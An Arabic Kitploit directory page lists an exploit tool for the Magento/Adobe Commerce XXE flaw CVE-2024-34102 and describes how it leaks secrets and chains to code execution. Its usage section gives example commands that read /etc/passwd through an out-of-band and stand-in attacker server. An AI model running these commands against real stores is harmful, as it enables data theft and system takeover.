Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento — CosmicSting: ثغرة أمنية حرجة من نوع XXE غير موثقة في Adobe Commerce و Magento (CVE-2024-34102) | Kitploit
أدوات/GitHubGitHub/jakabakos/cve-2024-34102-cosmicsting-xxe-in-adobe-commerce-and-magento
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبتسريب البياناتجمع المعلوماتاختبار الاختراق
GitHubjakabakos/cve-2024-34102-cosmicsting-xxe-in-adobe-commerce-and-magento

CVE-2024-34102-CosmicSting-XXE-in-Adobe-Commerce-and-Magento

CosmicSting: ثغرة أمنية حرجة من نوع XXE غير موثقة في Adobe Commerce و Magento (CVE-2024-34102)

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
91منذ 2 سنواتلم تتم المراجعة بعد

CosmicSting: ثغرة XXE خطيرة غير مصادق عليها في Adobe Commerce وMagento (CVE-2024-34102)

CVE-2024-34102 هي ثغرة أمنية خطيرة ناتجة عن معالجة غير صحيحة لإلغاء التّسلسل المتداخل في Adobe Commerce وMagento. تسمح هذه الثغرة للمهاجمين باستغلال كيانات XML الخارجية (XXE) أثناء عملية إلغاء التّسلسل، مما قد يتيح تنفيذ التعليمات البرمجية عن بُعد. باختصار، يمكن للمهاجمين صياغة حمولات JSON ضارة عند إلغاء تسلسلها من قبل التطبيق، تؤدي إلى إنشاء كائنات بخصائص أو سلوكيات غير مقصودة. قد يؤدي هذا إلى مخاطر أمنية متنوعة.

يتيح استغلال هذه الثغرة للمهاجمين الحصول على وصول إداري غير مصرح به إلى REST API أو GraphQL API أو SOAP API، مما قد يؤدي إلى سرقة البيانات، وتعطيل الخدمة، والاختراق الكامل للأنظمة المتأثرة. تشكل هذه الثغرة خطراً كبيراً نظراً لقدرتها على تسريب ملفات حساسة، مثل app/etc/env.php، الذي يحتوي على مفاتيح تشفير تُستخدم للمصادقة. يمكن للمهاجمين استغلال ذلك لتزوير رموز المسؤولين والتلاعب بواجهات Magento’s APIs كمستخدمين متميزين.

علاوة على ذلك، يمكن ربط CVE-2024-34102 بثغرات أخرى، مثل استغلال سلاسل مرشحات PHP (CVE-2024-2961)، مما يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE). الآثار الأوسع لثغرات كيان XML الخارجي (XXE) تمكن المهاجمين من استرداد البيانات والتلاعب بها من مصادر خارجية، مما يزيد من الأثر المحتمل على الأنظمة المخترقة.

الاستخدام

root@kitploit:~
usage: exploit.py [-h] --target TARGET --read-file READ_FILE [--oob-server OOB_SERVER] [--host-server HOST_SERVER]

Exploit script for XXE vulnerability

options:
  -h, --help            show this help message and exit
  --target TARGET, -t TARGET
                        Target URL (http(s)://ip[:port])
  --read-file READ_FILE, -r READ_FILE
                        File to read from the remote host
  --oob-server OOB_SERVER, -ob OOB_SERVER
                        OOB server URL (http(s)://ip[:port])
  --host-server HOST_SERVER, -hs HOST_SERVER
                        Host server URL (http(s)://ip[:port])

أمثلة

root@kitploit:~
# Run with local attacker server and local OOB server
python3 exploit.py -t https://magento.test -r "/etc/passwd"

# Run with remote attacker server and remote OOB server
python3 exploit.py -t https://magento.test --oob-server http://xxx.oasitfy.com --host-server https://remote-attacker-server.com -r "/etc/passwd"

# Detection
python3 detect.py -t https://magento.test

إخلاء مسؤولية

تم إنشاء هذا النص البرمجي للاستغلال لأغراض البحث وتطوير تقنيات دفاعية فعالة فقط. ليس المقصود منه استخدامه في أي أنشطة ضارة أو غير مصرح بها. يتنصل المؤلف ومالك النص البرمجي من أي مسؤولية أو التزام عن أي إساءة استخدام أو ضرر يسببه هذا البرنامج. يُطلب من المستخدمين استخدام هذا البرنامج بمسؤولية وفقط وفقًا للقوانين واللوائح المعمول بها. استخدمه بمسؤولية.

تنزيل الأداة